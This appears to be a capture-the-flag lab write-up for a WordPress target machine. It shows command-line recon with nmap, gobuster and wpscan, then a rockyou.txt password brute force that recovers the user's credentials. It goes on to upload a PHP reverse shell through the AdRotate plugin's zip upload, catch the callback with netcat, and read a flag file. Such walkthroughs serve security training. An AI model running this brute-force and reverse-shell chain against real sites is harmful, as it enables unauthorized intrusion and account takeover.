PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.158.121 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/wordpress (Status: 301) [Size: 194] [--> <http://192.168.158.121/wordpress/>]
Another WordPress on Intermediate Machine, however, this time no plugin 🥲
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://192.168.158.121/wordpress/>
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://192.168.158.121/wordpress/> [192.168.158.121]
[+] Started: Sun Jul 17 00:13:05 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.158.121/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.158.121/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://192.168.158.121/wordpress/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - <http://192.168.158.121/wordpress/>, Match: 'wp-includes\\/js\\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - <http://192.168.158.121/wordpress/>, Match: 'WordPress 5.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:09 <=======> (137 / 137) 100.00% Time: 00:00:09
[i] No Config Backups Found.
Move forward to enumerate users
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://192.168.158.121/wordpress/> --enumerate u
[i] User(s) Identified:
[+] loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Do a simple wpscan brute force with rockyou.txt and we get login credentials
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://192.168.158.121/wordpress/> -U loly -P /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / corazon Time: 00:00:19 < > (175 / 14344567) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
When we clicked on Log In and it redirect us to loly.lc, time to add to /etc/hosts
Then login with the credential loly:fernando and we can skip and ignore this thing
After login, the green color Ad caught my attention, so I navigate to Ad Rotate > Manage Media and indeed we got an upload tab right there, time for php-reverse-shell.php
However, we need to archive it as .zip because it will be auto extracted (Read the Descriptions!)
Then we setup our netcat and visit this link:
<http://loly.lc/wordpress/wp-content/banners/php-reverse-shell.php>
┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.158] from (UNKNOWN) [192.168.158.121] 55034
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
21:33:37 up 27 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/var/www
$ cat local.txt
c5f757373463346391e129735b77e067